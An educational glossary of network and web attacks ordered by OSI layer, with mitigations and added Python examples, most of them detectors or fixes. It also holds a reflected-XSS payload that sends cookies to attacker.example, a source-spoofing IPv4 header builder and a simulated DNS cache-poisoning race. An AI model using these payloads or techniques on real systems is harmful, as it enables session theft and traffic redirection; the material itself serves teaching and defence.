Eavesdropping
An attacker intercepts and monitors data transmitted over a wired or wireless network, using packet sniffers or network taps to capture packets in transit. The purpose is to steal credentials or other sensitive data sent in cleartext; captured traffic can also be used to launch further attacks such as session hijacking or man-in-the-middle (MITM). Encryption in transit (TLS, WPA2/WPA3) is the main defense, since a sniffer then sees only ciphertext. Eavesdropping attacks occur at the data link layer.
MAC Flooding
The attacker floods a switch with frames carrying a large number of fake source MAC addresses until the switch's MAC address (CAM) table is full. The switch can then no longer learn new addresses and falls back to "fail open" behaviour, flooding frames for unknown destinations out of all ports like a hub, so the attacker can sniff traffic that would normally be delivered only to the port of its destination. The flood of frames also disrupts the network and can cause a denial of service (DoS). MAC flooding attacks occur at the data link layer; port security with a limit on learned MAC addresses per port is the usual mitigation.
ARP Spoofing
An attacker sends forged ARP replies on the network that associate the attacker's MAC address with the IP address of another device, typically the default gateway. Victims update their ARP caches and send traffic for that IP address to the attacker, who can intercept or modify it before forwarding it on (man-in-the-middle) or simply drop it (denial of service). ARP spoofing attacks occur at the data link layer.
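The inconsistency that gives ARP spoofing away is an IP address whose MAC binding changes. The detector below is an added example, not code from the original page: it walks a constructed list of ARP replies (sender IP, sender MAC) in the order a sniffer on the LAN would see them and reports any IP whose MAC differs from the one first learned or from a trusted binding supplied by the operator. The addresses and the `detect_arp_spoofing` function name are illustrative.

```python
# Constructed sample of ARP replies as (sender_ip, sender_mac) tuples, in the
# order a sniffer on the LAN would observe them. Not captured from a real network.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:55"),   # the real gateway announces itself
    ("192.168.1.10", "aa:bb:cc:dd:ee:01"),
    ("192.168.1.1", "00:11:22:33:44:55"),
    ("192.168.1.1", "de:ad:be:ef:00:01"),   # attacker claims the gateway's IP
    ("192.168.1.10", "aa:bb:cc:dd:ee:01"),
    ("192.168.1.1", "de:ad:be:ef:00:01"),   # attacker repeats to keep caches poisoned
]


def detect_arp_spoofing(replies, trusted=None):
    """Return alerts for IPs whose IP->MAC binding changes.

    `trusted` is an optional dict of known-good ip -> mac bindings (e.g. the
    gateway); any reply contradicting it is flagged even on first sight.
    Otherwise the first MAC seen for an IP is learned and later changes are
    reported, which is the principle behind tools such as arpwatch.
    """
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = table.get(ip)
        if known is None:
            table[ip] = mac                       # learn the first binding seen
        elif known != mac:
            # Conflicting claim: the learned (or trusted) MAC is kept, the
            # new one is reported rather than overwriting the table.
            alerts.append({"ip": ip, "expected": known, "seen": mac})
    return alerts


if __name__ == "__main__":
    gateway = {"192.168.1.1": "00:11:22:33:44:55"}
    for a in detect_arp_spoofing(SAMPLE_ARP_REPLIES, trusted=gateway):
        print(f"ARP conflict for {a['ip']}: expected {a['expected']}, saw {a['seen']}")
```

A real monitor would feed this from a packet capture and also flag gratuitous replies for the gateway address that arrive far more often than normal; on managed switches, Dynamic ARP Inspection blocks the forged replies at the port.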
MAC Spoofing
The attacker changes the MAC address of their own interface to match one assigned to a legitimate device on the network. The purpose is to impersonate that device and bypass MAC-based controls such as switch port security, wireless MAC filtering or captive-portal whitelists, or otherwise gain unauthorized access to the network. MAC spoofing occurs at the data link layer.
STP Manipulation
STP manipulation exploits the Spanning Tree Protocol to alter the Layer 2 topology, causing instability or rerouting traffic. An attacker with a foothold on the LAN, for example a laptop plugged into an access port or a host compromised through email phishing, sends forged BPDUs advertising a lower bridge priority than the real root. The attacker's device is elected root bridge, so traffic between switches is now forwarded through it and can be intercepted in a MITM attack to steal credentials or other sensitive information. Repeatedly triggering topology changes, or combining this with MAC flooding, causes a denial of service instead. STP manipulation attacks occur at the data link layer; BPDU Guard and Root Guard on access ports are the usual mitigations.
SSID Spoofing
The attacker sets up a rogue access point that broadcasts the same SSID (Service Set Identifier) as a legitimate network, often with a stronger signal so that clients prefer it (an "evil twin"). Wireless clients that connect to it send their traffic through the attacker's device, where it can be intercepted or redirected to phishing pages. SSID spoofing attacks occur at the data link layer.
VLAN Hopping
Exploiting switch misconfiguration to send traffic into VLANs the attacker's port is not a member of. In switch spoofing, the attacker's laptop negotiates a dynamic trunk with the switch over DTP (Dynamic Trunking Protocol); once the port is a trunk, the attacker can send and receive 802.1Q-tagged frames for any VLAN carried on it. In double tagging, a frame carries two 802.1Q tags so that the next switch strips the outer (native VLAN) tag and forwards the frame into the VLAN named by the inner tag. This permits unauthorized access to hosts on the target VLAN and can also be used to attack them, for example with a flood of traffic. VLAN hopping attacks occur at the data link layer; disabling DTP on access ports and using an unused VLAN as the native VLAN on trunks are the usual mitigations.
IP Spoofing
An attacker sends IP packets whose source address field has been rewritten to disguise the true origin of the packet. The spoofed address may belong to a legitimate device (so that replies are sent to it, or to impersonate it to the receiver) or may be an unused address that is permitted on the subnet. IP spoofing is a building block for other attacks such as DNS cache poisoning, reflection/amplification and DDoS. It occurs at the network layer; ingress and egress filtering at network borders (BCP 38) prevents packets with addresses that do not belong to the sending network from leaving it.
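The header manipulation this paragraph describes is mechanical: the source address is just a field, and the only thing that must be recomputed is the header checksum. The block below is an added example, not code from the original page; it builds an IPv4 header with an arbitrary source address, recomputes the RFC 1071 checksum, and parses a header back to check whether its checksum is still valid. The addresses are from documentation ranges. It deliberately stops short of transmitting the packet, which needs a raw socket and root privileges.

```python
import socket
import struct


def ipv4_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words. Call with the checksum
    field zeroed to compute it, or with the field filled in to verify (result 0)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int,
                      proto: int = 17, ttl: int = 64, ident: int = 0x1234) -> bytes:
    """Build a 20-byte IPv4 header. `src` can be any address: the receiver has
    no way to tell from the header alone that it was not the real sender."""
    ver_ihl = (4 << 4) | 5                   # IPv4, 5 x 32-bit words, no options
    total_len = 20 + payload_len
    flags_frag = 0
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, ident, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    csum = ipv4_checksum(hdr)                # computed over the header with checksum = 0
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def parse_ipv4_header(hdr: bytes) -> dict:
    """Decode the fields a filter or sensor would look at, plus checksum validity."""
    f = struct.unpack("!BBHHHBBH4s4s", hdr[:20])
    return {
        "src": socket.inet_ntoa(f[8]),
        "dst": socket.inet_ntoa(f[9]),
        "ttl": f[5],
        "proto": f[6],
        "total_len": f[2],
        "checksum_ok": ipv4_checksum(hdr[:20]) == 0,
    }


if __name__ == "__main__":
    # Spoofed source 192.0.2.1 (attacker does not own it), 8-byte UDP payload assumed.
    h = build_ipv4_header("192.0.2.1", "198.51.100.7", payload_len=8)
    print(parse_ipv4_header(h))
    # Sending would be: socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    # followed by sendto(h + payload, (dst, 0)); this needs root and is often blocked
    # by the provider's egress filtering (BCP 38), which is the point of that control.
```

The parser shows why spoofing works: nothing in the header authenticates the source, and a correctly recomputed checksum makes the forged header indistinguishable from a genuine one. Only a router that knows which source addresses legitimately arrive on an interface can reject it.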
Route Hijacking
Cyberattack that redirects network traffic through a malicious router by injecting false routing information, for example by announcing a prefix the attacker does not own over BGP, or by injecting routes into an interior routing protocol that accepts unauthenticated updates. Traffic for the hijacked prefix flows to the attacker, who can intercept it to steal credentials or other sensitive data, modify it, or drop it to cause a denial of service. Route hijacking attacks occur at the network layer.
TCP ACK Flood
The attacker sends a large number of TCP ACK packets, usually with spoofed source addresses and distributed across a botnet, to targets such as routers, firewalls or servers. Because the ACKs belong to no existing connection, stateful devices must look up and discard each one, consuming CPU and memory until legitimate traffic is dropped. TCP ACK flood attacks occur at the transport layer.
TCP SYN Flood
Common denial-of-service attack in which the attacker sends numerous TCP SYN packets with spoofed source IP addresses. The server replies to each with a SYN/ACK as part of the TCP handshake and allocates state for the half-open connection, but the final ACK never arrives. The SYN backlog fills with half-open connections and new legitimate connections are refused until the entries time out. TCP SYN flood attacks occur at the transport layer; SYN cookies let a server avoid allocating state until the ACK arrives.
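On a Linux host the symptom described above is visible as a pile of sockets in SYN-RECV. The detector below is an added example, not code from the original page: it parses constructed lines in the format of `ss -tan` output and reports the number of half-open versus established connections on a service port, grouped by source /24 to show whether the sources are spread out (spoofed) or concentrated. The addresses, the threshold and the function names are illustrative.

```python
from collections import Counter

# Constructed lines in the shape of `ss -tan` output; not taken from a real host.
SAMPLE_SS_OUTPUT = """\
State      Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB      0      0      10.0.0.5:443        203.0.113.8:51012
SYN-RECV   0      0      10.0.0.5:443        198.51.100.23:40001
SYN-RECV   0      0      10.0.0.5:443        198.51.100.77:40002
SYN-RECV   0      0      10.0.0.5:443        198.51.100.9:40003
SYN-RECV   0      0      10.0.0.5:443        198.51.100.150:40004
SYN-RECV   0      0      10.0.0.5:443        192.0.2.14:40005
ESTAB      0      0      10.0.0.5:22         203.0.113.9:55100
SYN-RECV   0      0      10.0.0.5:443        198.51.100.201:40006
"""


def parse_ss(text: str) -> list:
    """Parse `ss -tan` style lines into dicts with state, local port and peer IP."""
    conns = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 5:
            continue
        state, local, peer = parts[0], parts[3], parts[4]
        conns.append({
            "state": state,
            "local_port": int(local.rsplit(":", 1)[1]),
            "peer_ip": peer.rsplit(":", 1)[0],
        })
    return conns


def half_open_report(conns: list, port: int = 443, threshold: int = 5) -> dict:
    """Summarise half-open connections on `port`.

    A SYN flood shows up as many SYN-RECV entries, far more than ESTAB, from
    sources that never complete the handshake. The threshold is illustrative;
    a real monitor would compare against the host's SYN backlog size.
    """
    half_open = [c for c in conns if c["state"] == "SYN-RECV" and c["local_port"] == port]
    established = [c for c in conns if c["state"] == "ESTAB" and c["local_port"] == port]
    by_prefix = Counter(".".join(c["peer_ip"].split(".")[:3]) for c in half_open)
    return {
        "half_open": len(half_open),
        "established": len(established),
        "by_prefix": dict(by_prefix),
        "suspected_flood": len(half_open) >= threshold and len(half_open) > 2 * len(established),
    }


if __name__ == "__main__":
    print(half_open_report(parse_ss(SAMPLE_SS_OUTPUT)))
    # With SYN cookies enabled (net.ipv4.tcp_syncookies=1) the kernel stops
    # allocating state for half-open connections once the backlog fills.
```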
TCP RST
A TCP RST (reset) attack injects forged TCP segments with the RST flag set into an existing connection. To be accepted, the forged segment must match the connection's addresses and ports and carry an acceptable sequence number; that is trivial for an on-path device such as an ISP middlebox or a firewall that sees the traffic, and much harder for an off-path attacker, who must guess it. On receiving the RST the endpoint tears down the connection, so repeated injection amounts to a denial of service. The technique is used by ISPs and nation-states to enforce censorship: connections to blacklisted hosts are reset and access to those websites is denied. TCP RST attacks occur at the transport layer.
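What counts as an "appropriate sequence number" decides how hard a blind reset is. The block below is an added example, not code from the original page: it models the receiver's decision for an incoming RST under the classic RFC 793 rule (any in-window sequence number resets the connection) and under RFC 5961 (only an exact match resets; other in-window values get a challenge ACK), and computes how many blind guesses each rule costs an attacker who already knows the four-tuple. The window size is an assumed default.

```python
# Assumed receive window for the worked numbers; real values come from the peer.
RCV_WND = 65535


def classify_rst(seg_seq: int, rcv_nxt: int, rcv_wnd: int = RCV_WND,
                 rfc5961: bool = True) -> str:
    """Decide what a receiver does with an RST segment.

    Returns "reset" (connection torn down), "challenge_ack" (RFC 5961: reply
    with an ACK carrying the expected sequence number and keep the connection)
    or "drop" (sequence number outside the receive window).
    """
    in_window = (seg_seq - rcv_nxt) % (1 << 32) < rcv_wnd
    if not in_window:
        return "drop"
    if not rfc5961:
        return "reset"                       # RFC 793: any in-window RST resets
    return "reset" if seg_seq == rcv_nxt else "challenge_ack"


def blind_rst_guesses(rcv_wnd: int = RCV_WND, rfc5961: bool = True) -> int:
    """Number of RST segments an off-path attacker needs to sweep the whole
    32-bit sequence space, given that the four-tuple is already known."""
    space = 1 << 32
    accepted_per_guess = 1 if rfc5961 else rcv_wnd   # how many values each guess covers
    return space // accepted_per_guess


if __name__ == "__main__":
    rcv_nxt = 1_000_000
    for seq in (rcv_nxt, rcv_nxt + 4000, rcv_nxt - 1):
        print(seq, classify_rst(seq, rcv_nxt, rfc5961=False), classify_rst(seq, rcv_nxt))
    print("RFC 793 sweep:", blind_rst_guesses(rfc5961=False), "segments")
    print("RFC 5961 sweep:", blind_rst_guesses(), "segments")
```

An on-path censor never needs the sweep: it reads the sequence number from the connection it is inspecting and sends one RST to each side. RFC 5961 raises the cost of the off-path case from tens of thousands of segments to billions, which is why the blind variant is now mostly of historical interest against patched stacks.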
HTTP Flood
Distributed denial-of-service (DDoS) attack that floods a target web server with HTTP requests, typically sent from a botnet. Because each request is a well-formed HTTP GET or POST, the traffic is harder to distinguish from legitimate users than a packet flood, and expensive requests (search pages, large downloads) maximise the load per request. The web server becomes unresponsive and the website is unavailable. HTTP flood attacks occur at the application layer.
ICMP Ping Flood
The attacker sends a flood of ICMP echo request (ping) packets to a target, for example a public server, to overload it. Processing each request and sending the echo reply consumes CPU, memory and bandwidth, and at sufficient volume the server cannot serve legitimate traffic, causing a denial of service. ICMP ping flood attacks occur at the network layer.
UDP Flood
The attacker sends a high volume of UDP packets, usually from a botnet, to random ports on the target machine. For each packet the target checks for a listening application and, finding none, replies with an ICMP Destination Unreachable message; the lookups and replies consume CPU, memory and bandwidth until the server becomes unresponsive. This is a distributed denial-of-service (DDoS) attack. Botnets for such floods are commonly built from vulnerable devices such as IoT equipment with firmware bugs or exposed HTTP management interfaces. UDP flood attacks occur at the transport layer.
UDP Amplification
An attacker sends small UDP requests to public servers with the source address spoofed to the IP address of the intended victim. The servers send their much larger replies to the spoofed address, so the traffic is both reflected toward the victim and amplified by the ratio of reply size to request size. Open DNS resolvers are a common example: a short query can return a response many times its size, turning a modest amount of attacker bandwidth into a large distributed denial-of-service (DDoS) flood. UDP amplification attacks occur at the transport layer.
DNS Flood
A DNS server is flooded (overloaded) with DNS queries, leading to service disruption. The attacker sends a large number of queries, often for random non-existent names so that caches cannot answer them, which consumes the server's resources and causes a denial of service. The purpose is to cause a broad outage, since almost every connection to a server starts with a DNS lookup. DNS flood attacks occur at the application layer.
Cross-Site Scripting (XSS)
A malicious script is inserted into a web page and executed in the browser of every client that views it. The root cause is user-supplied input that the server reflects back (reflected XSS) or stores and later renders (stored XSS) without encoding it for the HTML context in which it is placed. An attacker injects JavaScript, for example to steal session cookies, redirect users, or perform actions on their behalf. Cross-site scripting attacks occur at the application layer.
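The vulnerable pattern and its fix side by side, as an added example that is not code from the original page: a search page handler reflects the query into the HTML response, once unescaped and once through Python's `html.escape`. The payload is constructed for the demonstration and the handler names are illustrative.

```python
from html import escape

# Constructed reflected-XSS payload: exfiltrates document.cookie to an attacker host.
PAYLOAD = "<script>location='http://attacker.example/?c='+document.cookie</script>"


def render_search_vulnerable(query: str) -> str:
    """Reflects the user's query straight into the page body."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Same page, with the query encoded for an HTML text context.

    escape() turns < > & " ' into entities, so the browser renders the payload
    as text instead of parsing a <script> element. Encoding is context
    specific: a value placed inside a JavaScript block or a URL needs the
    encoding for that context, not HTML escaping.
    """
    return f"<p>Results for: {escape(query, quote=True)}</p>"


def contains_script_element(html: str) -> bool:
    """Crude check used here only to show the difference between the two renderers."""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
```

Output encoding at render time is the primary fix; marking the session cookie `HttpOnly` and deploying a Content Security Policy limit what an injected script can do if encoding is missed somewhere.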
SQL Injection Attacks
The attacker inserts SQL syntax into input that the application concatenates into a query, typically through fields like web forms or URL parameters, so that the input changes the structure of the query rather than being treated as data. The attacker exploits the missing separation between code and data to run arbitrary SQL on the backend database. The purpose is to gain unauthorized access to view, modify or delete data, bypass authentication, or in some configurations execute commands on the database host. SQL injection attacks occur at the application layer.
CSRF (Cross-Site Request Forgery)
An attack that makes an authenticated user's browser perform actions on a site without the user's intent. The victim opens an attacker-controlled page, for example through a phishing email link or a social media post, that contains a hidden form or image tag which triggers a request to the target site. The browser automatically attaches the victim's session cookie to that request, so the target site processes it as if the user had made it, for example a funds transfer on a banking site, an order on an e-commerce site or a post on social media. The attacker never sees the cookie, only the effect of the request. Logging out of a banking application before browsing email or other sites reduces exposure, but the effective defenses are server-side: anti-CSRF tokens tied to the session and the SameSite cookie attribute. CSRF attacks occur at the application layer.
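The server-side check that stops the forged request, as an added example that is not code from the original page. A transfer handler is simulated as a function over a request dict (cookie plus form fields); the anti-CSRF token is an HMAC of the session identifier under a server key, so a cross-site page that can make the browser send the cookie still cannot supply a matching token. The key is generated at start-up here and the handler, session and field names are illustrative.

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment secret; in production this comes from a secrets store.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Token bound to the session: only the server can produce it, and a token
    for one session does not validate for another."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted_token, key: bytes = SERVER_KEY) -> bool:
    expected = issue_csrf_token(session_id, key)
    # Constant-time comparison so the check does not leak the token byte by byte.
    return hmac.compare_digest(expected, submitted_token or "")


def handle_transfer(request: dict) -> str:
    """Simulated POST /transfer handler.

    `request` carries the session cookie the browser attached (present for both
    legitimate and cross-site requests) and the form fields the page submitted
    (the cross-site page cannot read the victim's token, so it cannot include it).
    """
    sid = request.get("cookie_session")
    if sid is None:
        return "401 not logged in"
    if not verify_csrf(sid, request.get("form", {}).get("csrf_token")):
        return "403 csrf check failed"
    return "200 transfer done"


# Session cookie attributes that complement the token: SameSite=Lax stops the
# browser from attaching the cookie to cross-site POSTs in the first place.
SET_COOKIE = "session=<id>; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    sid = "sess-abc"
    token = issue_csrf_token(sid)            # embedded in the bank's own form
    print(handle_transfer({"cookie_session": sid, "form": {"csrf_token": token, "amount": "100"}}))
    print(handle_transfer({"cookie_session": sid, "form": {"amount": "100"}}))  # attacker's hidden form
```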
Session Hijacking
An attacker takes over a web application session by obtaining the session ID or session cookie. The attacker intercepts or steals the session token and presents it to the application to impersonate the user without knowing their password. This is often accomplished with a man-in-the-middle (MITM) attack on an unencrypted connection or a cross-site scripting attack that reads the cookie. The purpose is to act as the user, for example to steal sensitive data or make bank transfers. Session hijacking attacks occur at the application layer.
SSL Stripping
Man-in-the-middle attack that downgrades a connection from HTTPS to unencrypted HTTP. The attacker, positioned between the client and the server (often on a public wireless network), serves the victim over plain HTTP while keeping its own HTTPS connection to the real server, rewriting links and redirects so that the victim never upgrades to HTTPS; all data then passes through the attacker in cleartext and can be read or modified. HSTS (HTTP Strict Transport Security), especially with preloading, defeats the attack for sites the browser already knows to require HTTPS. SSL stripping attacks occur at the application layer.
Session Replay
Replaying previously captured session credentials to gain unauthorized access. For example, the server issues a session ID or a JWT to a user on login; the attacker captures that session data (cookies, tokens) and later resends it to impersonate the legitimate user. The token is valid, so the application accepts it unless it is short-lived, bound to the client, or tracked so that reuse is detected. Session replay attacks occur at the application layer.
DNS Spoofing
DNS spoofing, or DNS cache poisoning, inserts a forged record into the cache of a recursive DNS server (or a client's local cache) so that later lookups are redirected to a malicious website. When the resolver sends a query upstream, the attacker sends a forged response that claims to answer it. The forgery is accepted only if it arrives before the legitimate answer and matches the outstanding query's transaction ID, destination port and question name; an attacker who can observe the query, for example from a host on the private network compromised through email phishing, knows those values, while a blind attacker must guess them, which is why resolvers randomize the transaction ID and source port. Once cached, the bogus record is served to every client until it expires. DNSSEC validation lets the resolver reject records that are not signed by the zone owner. DNS spoofing attacks occur at the application layer.
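The race described above, as an added example that is not code from the original page. A toy resolver keeps only the state that matters for poisoning: the (transaction ID, source port) pairs of outstanding queries and a cache. An attacker who can see the query wins immediately; a blind attacker sweeps guessed transaction IDs, which succeeds against a resolver with a fixed source port and fails against one that randomizes it. The DNS message builders produce real wire-format headers; the response body is omitted and the question name is passed in directly to keep the model short, and all names and addresses are illustrative.

```python
import random
import struct


def build_dns_query(txid: int, qname: str, qtype: int = 1) -> bytes:
    """Minimal DNS query: 12-byte header (RD set) plus one question (A record by default)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(bytes([len(l)]) + l.encode() for l in qname.rstrip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)


def build_forged_response(txid: int) -> bytes:
    """Header of a forged response (QR=1, RD, RA, one answer). A real forgery also
    repeats the question and carries an A record pointing at the attacker's host."""
    return struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)


def parse_dns_header(msg: bytes) -> dict:
    txid, flags = struct.unpack("!HH", msg[:4])
    return {"txid": txid, "is_response": bool(flags & 0x8000)}


class Resolver:
    """Toy recursive resolver: remembers outstanding queries and caches answers."""

    def __init__(self, randomize_port: bool = True, seed=None):
        self.rng = random.Random(seed)
        self.randomize_port = randomize_port
        self.pending = {}      # (txid, source_port) -> qname awaiting an answer
        self.cache = {}        # qname -> ip

    def send_query(self, qname: str):
        txid = self.rng.randrange(1 << 16)
        # Old resolvers used one fixed source port; modern ones pick a random one.
        port = self.rng.randrange(1024, 1 << 16) if self.randomize_port else 53
        self.pending[(txid, port)] = qname
        return build_dns_query(txid, qname), port

    def receive(self, dst_port: int, msg: bytes, qname: str, answer_ip: str) -> bool:
        """Accept a response only if txid, port and name match an outstanding query.
        Whoever matches first wins; the legitimate answer arriving later is discarded."""
        hdr = parse_dns_header(msg)
        key = (hdr["txid"], dst_port)
        if not hdr["is_response"] or self.pending.get(key) != qname:
            return False
        del self.pending[key]
        self.cache[qname] = answer_ip
        return True


def poison_attempt(resolver: Resolver, qname: str, evil_ip: str, guesses) -> bool:
    """Attacker's side: fire forged responses for each guessed (txid, port) pair
    during the window before the legitimate answer arrives."""
    for txid, port in guesses:
        if resolver.receive(port, build_forged_response(txid), qname, evil_ip):
            return True
    return False


if __name__ == "__main__":
    victim = "bank.example"
    old = Resolver(randomize_port=False, seed=1)
    old.send_query(victim)
    print("fixed port poisoned:", poison_attempt(old, victim, "203.0.113.66",
                                                 ((t, 53) for t in range(1 << 16))))
    new = Resolver(randomize_port=True, seed=1)
    new.send_query(victim)
    print("random port poisoned:", poison_attempt(new, victim, "203.0.113.66",
                                                  ((t, 53) for t in range(1 << 16))))
```

With a fixed port the blind attacker needs at most 65536 packets, which fits in the round-trip time to the authoritative server on a fast link; randomizing the port multiplies the search space by the number of possible ports. An attacker sniffing the query on the LAN skips the guessing entirely, which is why the observed-query case in the paragraph is the dangerous one on a compromised network.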
Email Spoofing
Faking the sender address of an email so that it appears to come from a trusted source. The attacker sets the "From" header to a legitimate sender's address, which is possible because SMTP does not verify sender identity by default. The purpose is to deceive recipients into trusting a phishing email or opening malware. SPF, DKIM and DMARC add the missing checks by letting the receiving server verify that the sending host and message are authorized for the claimed domain. Email spoofing attacks occur at the application layer.